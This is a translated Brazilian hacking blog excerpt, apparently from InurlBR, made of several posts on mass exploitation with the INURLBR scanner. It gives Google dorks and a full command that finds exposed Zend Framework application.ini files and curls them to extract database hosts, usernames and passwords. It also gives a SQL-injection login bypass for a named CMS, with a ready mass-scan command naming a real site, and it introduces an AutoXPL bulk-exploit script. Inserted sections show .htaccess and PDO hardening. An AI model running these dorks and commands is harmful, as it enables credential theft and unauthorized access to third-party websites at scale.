<span style="font-family: Courier New, Courier, monospace;">$validation['ZEND-FRAMEWORK-04'] = 'db.params.password';</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">$validation['ZEND-FRAMEWORK-05'] = 'db.params.dbname';</span></div>
<br />
<span style="font-size: large;"><b>COMMAND</b></span><br />
<br />
<b><span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">SET DORK:</span></b><br />
<span style="font-family: Courier New, Courier, monospace;">--dork '{YOUR_DORK}'</span> <i>or</i><br />
<span style="font-family: Courier New, Courier, monospace;">--dork-file 'arquivo_dorks.txt'</span><br />
Use:<br />
<span style="color: red; font-family: Courier New, Courier, monospace;"><b>--dork '</b>site:br index of "/application/configs/"<b>'</b></span> <i>or</i><br />
<b style="color: red; font-family: 'Courier New', Courier, monospace;">--dork-file '</b><span style="color: red; font-family: 'Courier New', Courier, monospace;">zend-dorks.txt</span><b style="color: red; font-family: 'Courier New', Courier, monospace;">'</b></div>
<div>
<br /></div>
<div>
<b><span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">SET OUTPUT FILE:</span></b><br />
<span style="font-family: Courier New, Courier, monospace;">-s '{FILE}'</span><br />
Use:<br />
<span style="color: red; font-family: Courier New, Courier, monospace;"><b>-s '</b>zend.txt<b>'</b></span></div>
<div>
<br /></div>
<div>
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><b>SET SEARCH ENGINE IDs:</b></span><br />
<span style="font-family: Courier New, Courier, monospace;">-q '{ID}'</span><br />
Use:</div>
<div>
<span style="color: red; font-family: Courier New, Courier, monospace;"><b>-q</b> 1,6,7,14,22</span></div>
<div>
<br /></div>
<div>
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><b>SET URL FILTER:</b></span> Only URLs containing the string set in this parameter enter the test loop.<br />
<span style="font-family: Courier New, Courier, monospace;">--ifurl '{STRING_VALIDATION}'</span></div>
<div>
Use:</div>
<div>
<span style="color: red; font-family: Courier New, Courier, monospace;"><b>--ifurl '</b>configs<b>'</b></span></div>
<div>
<br /></div>
<div>
<b><span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">SET REPLACE - URL MANIPULATION:</span></b></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">--replace 'OLD_STRING[INURL]NEW_STRING'</span></div>
<div>
Use:</div>
<div>
<span style="color: red; font-family: Courier New, Courier, monospace;"><b>--replace '</b><i>/configs</i>[INURL]<i>/configs/application.ini#</i><b>'</b></span></div>
<div>
<br />
<b><span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">URL manipulation example:</span></b><br />
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">Original URL coming from the search engine or file:</span><br />
<span style="font-family: Courier New, Courier, monospace;">http://www.target.com.br<b>/pasta/application<i>/configs</i>/languages/de/</b></span><br />
<br />
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">URL modified by the replace:</span><br />
<span style="font-family: Courier New, Courier, monospace;">http://www.target.com.br<b>/pasta/application<i>/configs/application.ini#</i>/languages/de/</b></span><br />
<br />
The function replaced the string<b> <span style="color: red; font-family: Courier New, Courier, monospace;">/configs</span> </b>with <b><span style="color: red; font-family: Courier New, Courier, monospace;">/configs/application.ini#</span></b>, and everything after the <b><span style="color: red; font-family: Courier New, Courier, monospace;">"#"</span></b> is ignored (a URL fragment is never sent in the HTTP request). <br />
<br />
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><b>SET CUSTOM COMMAND: </b></span></div>
<div>
The command only runs if the script finds something it considers vulnerable.</div>
<div>
<span style="font-family: Courier New, Courier, monospace;">--command-vul '{COMMAND_LINE}'</span></div>
<div>
Use:</div>
<div>
<span style="color: red; font-family: Courier New, Courier, monospace;"><b>--command-vul "</b>curl '_TARGETFULL_application.ini' --user-agent 'INURLBR/5.0 (X11; Linux x86_64)' | grep 'host\|username\|password\|dbname'<b>"</b></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><i>NOTE: this command only shows the credential lines (host, username, password, dbname) of the exposed file</i></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><b>FULL COMMAND:</b></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span style="color: red;">php inurlbr.php</span> </span><b style="color: red; font-family: 'Courier New', Courier, monospace;">--dork '</b><span style="color: red; font-family: 'Courier New', Courier, monospace;">site:br index of "/application/configs/"</span><b style="color: red; font-family: 'Courier New', Courier, monospace;">' </b><b style="color: red; font-family: 'Courier New', Courier, monospace;">-s '</b><span style="color: red; font-family: 'Courier New', Courier, monospace;">zend.txt</span><b style="color: red; font-family: 'Courier New', Courier, monospace;">' </b><b style="color: red; font-family: 'Courier New', Courier, monospace;">-q</b><span style="color: red; font-family: 'Courier New', Courier, monospace;"> 1,6,7,14,22 </span><b style="color: red; font-family: 'Courier New', Courier, monospace;">--replace '</b><i style="color: red; font-family: 'Courier New', Courier, monospace;">/configs</i><span style="color: red; font-family: 'Courier New', Courier, monospace;">[INURL]</span><i style="color: red; font-family: 'Courier New', Courier, monospace;">/configs/application.ini#</i><b style="color: red; font-family: 'Courier New', Courier, monospace;">' </b><b style="color: red; font-family: 'Courier New', Courier, monospace;">--command-vul "</b><span style="color: red; font-family: 'Courier New', Courier, monospace;">curl '_TARGETFULL_application.ini' --user-agent 'INURLBR/5.0 (X11; Linux x86_64)' | grep 'host\|username\|password\|dbname'</span><b style="color: red; font-family: 'Courier New', Courier, monospace;">"</b></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><b><br /></b></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><b><br /></b></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><b>PRINT OUTPUT:</b></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhnQAFbgOxxqKPqybfq9cMniLSl_EvMQmw0lFt4DoNpu4nOyk73AVyTYNkP5tY3T3Yk6ikykDaxha6OxkLmxi4vOFr-LXn7MolGvQEWsC7zYVSLfma74j_wHm-2SL7BcD8qIGI-30glCM4d/s1600/Captura+de+tela+de+2015-09-08+05%253A38%253A13.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="Screenshot: INURLBR output for the full command" border="0" height="360" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhnQAFbgOxxqKPqybfq9cMniLSl_EvMQmw0lFt4DoNpu4nOyk73AVyTYNkP5tY3T3Yk6ikykDaxha6OxkLmxi4vOFr-LXn7MolGvQEWsC7zYVSLfma74j_wHm-2SL7BcD8qIGI-30glCM4d/s640/Captura+de+tela+de+2015-09-08+05%253A38%253A13.png" width="640" /></a></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><b><br /></b></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><b><br /></b></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><b>SOLUTIONS ????<br />A custom .htaccess.<br />Proper permissions on the affected folders.</b></span><br />
<ol style="font-family: Courier New, Courier, monospace;">
<li><b><a href="http://thiagosantos.com/blog/186/webservers/alterando-o-arquivo-index-com-htaccess/" target="_blank">http://thiagosantos.com/blog/186/webservers/alterando-o-arquivo-index-com-htaccess/</a></b></li>
<li><b><a href="http://www.devin.com.br/apache-autoindex/">http://www.devin.com.br/apache-autoindex/</a></b></li>
<li><b><a href="http://wiki.locaweb.com/pt-br/Alterando_a_permiss%C3%A3o_de_pastas_em_Linux" target="_blank">http://wiki.locaweb.com/pt-br/Alterando_a_permiss%C3%A3o_de_pastas_em_Linux</a></b></li>
<li><b><a href="http://rberaldo.com.br/chmod-permissoes-em-sistemas-linux-e-unix-like/" target="_blank">http://rberaldo.com.br/chmod-permissoes-em-sistemas-linux-e-unix-like/</a></b></li>
<li><b><a href="http://www.vivaolinux.com.br/dica/Impedindo-listagem-de-diretorio-no-Apache">http://www.vivaolinux.com.br/dica/Impedindo-listagem-de-diretorio-no-Apache</a></b></li>
<li><b><a href="http://blog.inurl.com.br/2014/07/explorando-falha-no-zend-framework-full.html" target="_blank">http://blog.inurl.com.br/2014/07/explorando-falha-no-zend-framework-full.html</a></b></li>
</ol>
</div>
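The two fixes above made concrete, as an added example that is not from the blog or from Zend Framework: an Apache .htaccess for the directory that contains application/, assuming that directory has to stay under the document root and that AllowOverride permits Options, FileInfo and Limit there.

```apache
# Added example, not from the blog: .htaccess for the directory holding
# application/ when it cannot be moved out of the document root (the cleaner
# fix is the Zend Framework 1 layout with only public/ under DocumentRoot).
# Assumes AllowOverride permits Options, FileInfo and Limit for this directory.

# 1. No auto-generated "Index of /application/configs/" listings.
Options -Indexes

# 2. Never serve .ini files over HTTP, whatever directory they sit in.
<FilesMatch "\.ini$">
    <IfModule mod_authz_core.c>
        Require all denied
    </IfModule>
    <IfModule !mod_authz_core.c>
        Order allow,deny
        Deny from all
    </IfModule>
</FilesMatch>

# 3. Refuse the whole configs tree too, so backups and renamed copies
#    (application.ini.bak, db.ini~) are not served either.
<IfModule mod_rewrite.c>
    RewriteEngine On
    # Per-directory context: the pattern is matched against the path
    # relative to this .htaccess, hence no leading slash.
    RewriteRule ^application/configs(/|$) - [F,L]
</IfModule>

# 4. File permissions (the post's second fix) cannot be set from .htaccess:
#    on the host, the *.ini files should be readable by the web server user
#    only, for example owned by the web server account with mode 640.
```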
<div>
<span style="font-family: Courier New, Courier, monospace;"><b><br /></b></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><b><br /></b></span></div>
</div>
</div>
<h3>Scanner INURLBR exploiting via POST</h3>
<div>Posted by InurlBR, 2015-08-20</div>
(<i>Good morning, good afternoon, good evening</i>) lol, this is <b>googleINURL</b> writing, bringing you a different way of exploiting with the <b><a href="http://blog.inurl.com.br/search/label/INURLBR" target="_blank">INURLBR</a></b> scanner using <b>POST</b> requests.<br />
<div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEioGPU3ybHGDtylQ48CdT6O22XWJgU0xoN26C_MBHPF66eCvLZk9Vi73PtaWNPf_O6z-DWkeHT-CkSSbLk9oclMn-OeDdX-5L5bEgOJzHTtixLKzrK5EbbDyuiQ1sQB6lpW-SMe8JfB82oo/s1600/Figure01.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="Figure 1: INURLBR scanner exploiting via POST" border="0" height="316" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEioGPU3ybHGDtylQ48CdT6O22XWJgU0xoN26C_MBHPF66eCvLZk9Vi73PtaWNPf_O6z-DWkeHT-CkSSbLk9oclMn-OeDdX-5L5bEgOJzHTtixLKzrK5EbbDyuiQ1sQB6lpW-SMe8JfB82oo/s640/Figure01.png" width="640" /></a></div>
<br />
<br /></div>
<div>
So far the scanner has mostly been used for exploitation via <b>GET</b>, validating the returned values; we will do the same, but with options aimed at the <b>POST</b> request.</div>
<div>
<br /></div>
<div>
For this tutorial we will use an exploit published on <a href="http://www.exploit4arab.net/" target="_blank">Exploit4arab</a></div>
<div>
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><b>Exploit:</b></span></div>
<div>
<a href="http://www.exploit4arab.net/exploits/1741" target="_blank">http://www.exploit4arab.net/exploits/1741</a> - <span style="font-family: Courier New, Courier, monospace;">Exploit Author : GeNeRaL</span></div>
<div>
Affected Webs/Versions : All<br />
<br /></div>
<div>
The XPL exploits an <a href="http://blog.inurl.com.br/search/label/sqli" target="_blank">SQLi</a> flaw in the site's administrative login panel, a <b>CMS</b> made by the company <a href="http://www.shafferwebdesign.com/" target="_blank">Shafferwebdesign</a>.<br />
<br />
Dork:</div>
<div>
intext:"by Shaffer Web Design" ext:php</div>
<div>
intext:"Designed by Shaffer Web Design" </div>
<div>
intext:"Website Development provided by Shaffer Web Design"</div>
<div>
<br />
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><b>Access: </b></span><br />
<span style="font-family: 'Courier New', Courier, monospace;">http://www.xx.com<span style="color: red;">/admin.php</span></span></div>
<div>
<span style="font-family: 'Courier New', Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><b>POC:</b></span><br />
POST request</div>
<div>
<span style="font-family: Courier New, Courier, monospace;">http://www.xx.com<span style="color: red;">/login.php?email=<b>'=' 'OR'</b>&password=<b>'=' 'OR'</b>&from_page=http://www.xx.us/&Submit_Login=Login to My Account</span></span></div>
<div>
<br />
Fields exploited with a simple bypass:<br />
<span style="color: red; font-family: 'Courier New', Courier, monospace;">email=</span><b style="color: red; font-family: 'Courier New', Courier, monospace;"><i>'=' 'OR'</i></b></div>
<div>
<span style="color: red; font-family: 'Courier New', Courier, monospace;">password=</span><b style="color: red; font-family: 'Courier New', Courier, monospace;"><i>'=' 'OR'</i></b></div>
<div>
<br /></div>
<div>
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><b>Debug request:</b></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhTQv0LtNWBjNrfXqyBjJ421Re0EcANnQWjgQWJdFGpZfgf9P1ih5DwIIce1zhDeUjpr481N77V9FOis5wdPLWLsiPYz1DL0leP5aOD-RzitZo2TebwXTc4gNPyMIbfpKcE1RXLrl3HMWSv/s1600/Captura+de+tela+de+2015-08-20+00%253A16%253A31.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="Screenshot: debug of the POST request to login.php" border="0" height="358" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhTQv0LtNWBjNrfXqyBjJ421Re0EcANnQWjgQWJdFGpZfgf9P1ih5DwIIce1zhDeUjpr481N77V9FOis5wdPLWLsiPYz1DL0leP5aOD-RzitZo2TebwXTc4gNPyMIbfpKcE1RXLrl3HMWSv/s640/Captura+de+tela+de+2015-08-20+00%253A16%253A31.png" width="640" /></a></div>
<div>
<br />
<ul>
<li>1 - We send the <b>bypass</b> request to the <b>login.php</b> file</li>
<li>2 - The server accepts the request and returns an HTTP 302 redirect code.</li>
<li>3 - We are redirected to the server's <b>my_account.php</b> page.</li>
</ul>
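Added example (not code from the blog, from iBooking or from the Shaffer CMS) covering both the "Solution? Use PDO" advice in the iBooking post and the login bypass above: an in-memory SQLite database stands in for MySQL, the table, user and function names are constructed for the demo, and the vulnerable query is only built as a string, never executed.

```php
<?php
declare(strict_types=1);

// Constructed test data: an in-memory SQLite database stands in for the
// MySQL backends the posts describe (PDO_MYSQL in the leaked Zend configs).
$pdo = new PDO('sqlite::memory:', null, null, [
    PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
    PDO::ATTR_EMULATE_PREPARES => false,   // let the driver prepare, not PHP
]);
$pdo->exec('CREATE TABLE users (id INTEGER PRIMARY KEY, email TEXT, pass_hash TEXT)');
$pdo->exec('CREATE TABLE lodgings (id INTEGER PRIMARY KEY, name TEXT)');
$pdo->prepare('INSERT INTO users (email, pass_hash) VALUES (?, ?)')
    ->execute(['admin@example.test', password_hash('correct horse', PASSWORD_DEFAULT)]);
$pdo->prepare('INSERT INTO lodgings (id, name) VALUES (?, ?)')
    ->execute([61, 'Pousada Teste']);

// VULNERABLE (the pattern behind both posts): user input is spliced straight
// into the SQL text, so quotes inside the value rewrite the WHERE clause.
// Only built here for illustration. On MySQL the blog's payload '=' 'OR'
// makes the condition true for every row, because (email='')=' ' is compared
// loosely as 0 = 0 and the trailing OR '' keeps the expression valid.
function vulnerableLoginSql(string $email, string $password): string
{
    return "SELECT id FROM users WHERE email='$email' AND password='$password'";
}

// HARDENED: validate the shape of the input, hand SQL and values to the
// driver separately, and check the password with password_verify().
function hardenedLogin(PDO $pdo, string $email, string $password): ?int
{
    // Anything that is not an e-mail address never reaches the database.
    if (filter_var($email, FILTER_VALIDATE_EMAIL) === false) {
        return null;
    }
    $stmt = $pdo->prepare('SELECT id, pass_hash FROM users WHERE email = :email');
    $stmt->execute([':email' => $email]);   // bound value, never SQL text
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    if ($row === false || !password_verify($password, $row['pass_hash'])) {
        return null;
    }
    return (int) $row['id'];
}

// HARDENED numeric parameter (the idPousada case from the iBooking post):
// an integer filter rejects anything but a plain id, and the bound
// parameter is typed as an integer.
function hardenedFindLodging(PDO $pdo, string $rawId): ?string
{
    $id = filter_var($rawId, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return null;
    }
    $stmt = $pdo->prepare('SELECT name FROM lodgings WHERE id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    $name = $stmt->fetchColumn();
    return $name === false ? null : $name;
}

$bypass = "'=' 'OR'";   // the payload shown in the Shaffer post
echo "SQL the vulnerable code would run: ", vulnerableLoginSql($bypass, $bypass), PHP_EOL;
var_dump(hardenedLogin($pdo, $bypass, $bypass));                       // payload rejected
var_dump(hardenedLogin($pdo, 'admin@example.test', 'correct horse'));  // real user
var_dump(hardenedFindLodging($pdo, '61 AND 1=1'));                     // injected text
var_dump(hardenedFindLodging($pdo, '61'));                             // plain id
```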
<div>
Now let's build the command for exploitation via INURLBR.<br />
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif; font-size: large;">Download:</span></div>
</div>
<div>
<a href="https://github.com/googleinurl/SCANNER-INURLBR">https://github.com/googleinurl/SCANNER-INURLBR</a></div>
<div>
<br /></div>
<div>
Command:</div>
<div>
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><b>- Set the search DORK:</b></span><br />
Example:</div>
<div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><b>--dork</b> Defines which dork the search engine will use.</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"> Example: <span style="color: red;"><b>--dork</b> {dork}</span></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"> Usage: <span style="color: red;"><b>--dork</b> <b>'</b>site:.gov.br inurl:php? id<b>'</b></span></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"> - Using multiples dorks:</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"> Example: <span style="color: red;"><b>--dork</b> {[DORK]dork1[DORK]dork2[DORK]dork3}</span></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"> Usage: <span style="color: red;"><b>--dork</b> <b>'</b>[DORK]site:br[DORK]site:ar inurl:php[DORK]site:il inurl:asp<b>'</b></span></span></div>
</div>
<div>
<br /></div>
<div>
Used for the current exploitation:</div>
<div>
<span style="color: red; font-family: Courier New, Courier, monospace;"><b>--dork '</b>intext:"by Shaffer Web Design" ext:php<b>'</b></span><br />
<span style="color: red; font-family: Courier New, Courier, monospace;"><b><br /></b></span></div>
<div>
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><b>- Set OUTPUT:</b></span></div>
<div>
Example:</div>
<div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><b>-s</b> Specify the output file where it will be saved the vulnerable URLs.</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"> Example: <span style="color: red;"><b>-s</b> {file}</span></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"> Usage: <span style="color: red;"><b>-s</b> your_file.txt</span></span></div>
</div>
<div>
<br /></div>
<div>
Used for the current exploitation:</div>
<div>
<span style="color: red; font-family: Courier New, Courier, monospace;"><b>-s</b> tutorial.txt</span></div>
<div>
<br /></div>
<div>
<b><span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">- Set ifredirect, validation of the redirect URL:</span></b></div>
<div>
Example:</div>
<div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><b> --ifredirect</b> Return validation method post REDIRECT_URL</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"> Example: <span style="color: red;"><b>--ifredirect</b> {string_validation}</span></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"> Usage: <span style="color: red;"><b>--ifredirect '</b>/admin/painel.php<b>'</b></span></span></div>
</div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span style="color: red;"><b><br /></b></span></span></div>
<div>
Used for the current exploitation:</div>
<div>
<b style="color: red; font-family: 'Courier New', Courier, monospace;">--</b><span style="color: red; font-family: Courier New, Courier, monospace;"><b>ifredirect</b></span><span style="color: red; font-family: 'Courier New', Courier, monospace;"> </span><span style="color: red; font-family: Courier New, Courier, monospace;">'my_account.php'</span></div>
<div>
<span style="color: red; font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<b><span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">- Set the string that will be appended to the host; for that we use exploit-get:</span></b></div>
<div>
Example:</div>
<div>
<div>
<span style="font-family: Courier New, Courier, monospace;"> <b>--exploit-get</b> Defines which exploit will be injected through the GET method to each URL found.</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"> Example: <span style="color: red;"><b>--exploit-get</b> {exploit_get}</span></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"> Usage: <span style="color: red;"><b>--exploit-get "</b>?'´%270x27;<b>"</b></span></span></div>
</div>
<div>
<br /></div>
<div>
<div>
Used in the current exploitation:</div>
<div>
<span style="color: red; font-family: Courier New, Courier, monospace;"><b>--exploit-get</b> '/login.php'</span></div>
</div>
<div>
That raises the question: why use exploit-get on something that is exploited via POST?<br />
A: <i>The exploit-get option of the inurlbr script is treated more like a string concatenator, appended to the end of each target before the request is executed, which is why it can be used without changing the overall request.</i><br />
<br />
<b><span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">- Set the POST bypass request</span></b><br />
Example:<br />
<span style="font-family: Courier New, Courier, monospace;"><b> --exploit-post</b> Defines which exploit will be injected through the POST method to each URL found.</span><br />
<span style="font-family: Courier New, Courier, monospace;"> Example: <span style="color: red;"><b>--exploit-post</b> {exploit_post}</span></span><br />
<span style="font-family: Courier New, Courier, monospace;"> Usage: <span style="color: red;"><b>--exploit-post</b> 'field1=valor1&field2=valor2&field3=?´0x273exploit;&botao=ok'</span></span><br />
<div>
<br /></div>
Used in the current exploitation:<br />
<span style="color: red; font-family: Courier New, Courier, monospace;"><b>--exploit-post</b> "email='=' 'OR'&password='=' 'OR'&from_page=http://www.theultimaterose.com/&Submit_Login=Login to My Account"</span><br />
<br />
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif; font-size: large;"><b>Full command:</b></span><br />
<span style="color: red; font-family: Courier New, Courier, monospace;">php inurlbr.php </span><b style="color: red; font-family: 'Courier New', Courier, monospace;">--dork '</b><span style="color: red; font-family: 'Courier New', Courier, monospace;">intext:"by Shaffer Web Design" ext:php</span><b style="color: red; font-family: 'Courier New', Courier, monospace;">'</b><span style="color: red; font-family: Courier New, Courier, monospace;"> <b>-s</b> tutorial.txt <b>--ifredirect</b> <b>'</b>my_account.php<b>'</b> <b>--exploit-get</b> <b>'</b>/login.php<b>'</b> <b>--exploit-post</b> <b>"</b>email='=' 'OR'&password='=' 'OR'&from_page=http://www.xx.com/&Submit_Login=Login to My Account<b>"</b></span><br />
<br />
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><b>Example of vulnerable output:</b></span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEha9Ytwq4a0J34dhY4aONsvK7fGsj7yq6chsH2LcLMtqF04LWMyuy1-VcHFJWfVAeRglHyD0PtEAKigl5emBb3ZLosym1V4qxrmIxyMrRcNwxkFNeCho3ksyvDzU82WZ8467V1yrPY0EXje/s1600/Captura+de+tela+de+2015-08-19+23%253A33%253A37.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="Screenshot: inurlbr output for the full command above, showing a vulnerable result" border="0" height="358" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEha9Ytwq4a0J34dhY4aONsvK7fGsj7yq6chsH2LcLMtqF04LWMyuy1-VcHFJWfVAeRglHyD0PtEAKigl5emBb3ZLosym1V4qxrmIxyMrRcNwxkFNeCho3ksyvDzU82WZ8467V1yrPY0EXje/s640/Captura+de+tela+de+2015-08-19+23%253A33%253A37.png" title="inurlbr vulnerable output" width="640" /></a></div>
Note: <i>In the screenshot example I used the -o option to open a file with the target.</i><br />
<br />
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif; font-size: large;"><b>Solution?</b></span><br />
<br />
<ol>
<li>Always filter what comes from the client.</li>
<li>Do not trust data that comes from the client.</li>
<li>Filter every request, GET or POST ($_REQUEST).</li>
<li>Use PDO without moderation; prepared statements are the power.</li>
<li>Use PHP's native filters (filter_var).</li>
</ol>
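<div>
Added example (not code from the original post or from the inurlbr project): the login query pattern the POST payload above abuses, beside the fix that items 4 and 5 describe, a <span style="font-family: Courier New, Courier, monospace;">filter_var()</span> check followed by a PDO prepared statement. It runs stand-alone against an in-memory SQLite database with a constructed <span style="font-family: Courier New, Courier, monospace;">users</span> table; the bypass string is a constructed equivalent, since the post's <span style="font-family: Courier New, Courier, monospace;">'=' 'OR'</span> form relies on MySQL's loose string-to-number comparison.</div>

```php
<?php
// Added example, not code from the original post or from the inurlbr project.
// Needs PHP with the pdo_sqlite extension (enabled in most builds).

function makeDb(): PDO
{
    $db = new PDO('sqlite::memory:');
    $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    // Constructed legacy schema with a clear-text password column, so the
    // "before" query can be shown the way such sites had it. Hashing the column
    // (password_hash/password_verify) is the next step once the query is fixed.
    $db->exec('CREATE TABLE users (id INTEGER PRIMARY KEY, email TEXT NOT NULL, password TEXT NOT NULL)');
    $db->exec("INSERT INTO users (email, password) VALUES ('alice@example.com', 'correct horse')");
    return $db;
}

// BEFORE (items 1 and 2 ignored): request values are spliced into the SQL
// text, so whatever the client sends becomes part of the query grammar.
function loginVulnerable(PDO $db, string $email, string $password): bool
{
    $sql = "SELECT id FROM users WHERE email='$email' AND password='$password'";
    return $db->query($sql)->fetchColumn() !== false;
}

// AFTER: check the shape of the input with filter_var() (item 5), then hand the
// values to the database as bound parameters (item 4). The query text is fixed
// before any user data is seen; a quote inside $password is just a character
// of a string value, never an SQL token.
function loginSafe(PDO $db, string $email, string $password): bool
{
    if (filter_var($email, FILTER_VALIDATE_EMAIL) === false) {
        return false; // not an e-mail address: reject before touching the database
    }
    $stmt = $db->prepare('SELECT id FROM users WHERE email = :email AND password = :password');
    $stmt->execute([':email' => $email, ':password' => $password]);
    return $stmt->fetchColumn() !== false;
}

$db = makeDb();

// Constructed bypass string. The post's "email='=' 'OR'" form relies on MySQL
// comparing strings and numbers loosely; SQLite does not, so the explicit
// tautology is used here. Concatenated into the WHERE clause it makes the
// condition always true, and the first user row comes back.
$bypass = "x' OR '1'='1";

$cases = [
    ['vulnerable', 'real credentials',  'loginVulnerable', 'alice@example.com', 'correct horse'],
    ['vulnerable', 'injected password', 'loginVulnerable', 'alice@example.com', $bypass],
    ['vulnerable', 'both injected',     'loginVulnerable', $bypass,             $bypass],
    ['prepared',   'real credentials',  'loginSafe',       'alice@example.com', 'correct horse'],
    ['prepared',   'injected password', 'loginSafe',       'alice@example.com', $bypass], // stopped by the prepared statement
    ['prepared',   'both injected',     'loginSafe',       $bypass,             $bypass], // stopped by filter_var()
];
foreach ($cases as [$variant, $input, $fn, $email, $password]) {
    printf("%-10s %-17s -> %s\n", $variant, $input, $fn($db, $email, $password) ? 'LOGIN' : 'denied');
}
```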
<br />
<b><span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">References for solutions and further study:</span></b><br />
<a href="http://php.net/manual/pt_BR/security.database.sql-injection.php" target="_blank">http://php.net/manual/pt_BR/security.database.sql-injection.php</a><br />
<a href="https://www.owasp.org/index.php/Testing_for_SQL_Injection_(OTG-INPVAL-005)" target="_blank">https://www.owasp.org/index.php/Testing_for_SQL_Injection_(OTG-INPVAL-005)</a><br />
<a href="http://php.net/manual/en/pdo.prepared-statements.php" target="_blank">http://php.net/manual/en/pdo.prepared-statements.php</a><br />
<a href="http://us3.php.net/manual/en/filter.filters.validate.php" target="_blank">http://us3.php.net/manual/en/filter.filters.validate.php</a><br />
<a href="https://www.owasp.org/images/5/57/OWASP-AppSecEU08-Janot.pdf" target="_blank">https://www.owasp.org/images/5/57/OWASP-AppSecEU08-Janot.pdf</a></div>
AutoXPL - Running commands in bulk (InurlBR, 2015-08-18)<div style="text-align: center;">
"Too lazy to write a post in the gringos' language, so it's going to be in PT-BR."</div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
I'm bringing a script that has been saving my skin for a long time when it comes to mass exploitation, on the "engine" side. But what is an "engine"?<br />
By engine I mean a script that can supply targets, whether from a file, a database, or generated dynamically.</div>
<div style="text-align: left;">
That is exactly what AutoXPL does: it runs other exploits in bulk.<br />
Suppose you have a basic script that exploits a given SQLi flaw on a server,<br />
where you only need to pass the target as a parameter; it exploits one target at a time (1 to 1).<br />
<br /></div>
<div style="text-align: left;">
<pre> [+] AUTOR: googleINURL
[+] EMAIL: inurlbr@gmail.com
[+] Blog: http://blog.inurl.com.br
[+] Twitter: https://twitter.com/googleinurl
[+] Fanpage: https://fb.com/InurlBrasil
[+] Pastebin http://pastebin.com/u/Googleinurl
[+] GIT: https://github.com/googleinurl
[+] PSS: http://packetstormsecurity.com/user/googleinurl
[+] YOUTUBE: http://youtube.com/c/INURLBrasil
[+] PLUS: http://google.com/+INURLBrasil</pre>
<br />
<br />
Let's use a simple example: a ping script that fires a ping at the host.</div>
<div style="text-align: left;">
